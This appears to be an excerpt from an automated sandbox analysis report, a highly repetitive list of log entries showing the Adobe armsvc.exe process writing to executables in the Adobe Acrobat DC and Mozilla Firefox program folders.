            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
